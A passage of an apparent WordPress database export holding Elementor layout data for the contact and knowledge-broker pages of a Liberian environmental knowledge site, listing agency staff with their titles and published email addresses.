23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24717,3659,'_wp_attached_file','2021/03/domah.png'),(24718,3659,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:17:\"2021/03/domah.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"domah-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"domah-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24725,3661,'_elementor_edit_mode','builder'),(24726,3661,'_elementor_template_type','wp-page'),(24727,3661,'_elementor_version','3.0.16'),(24728,3661,'_wp_page_template','default'),(24729,3661,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiag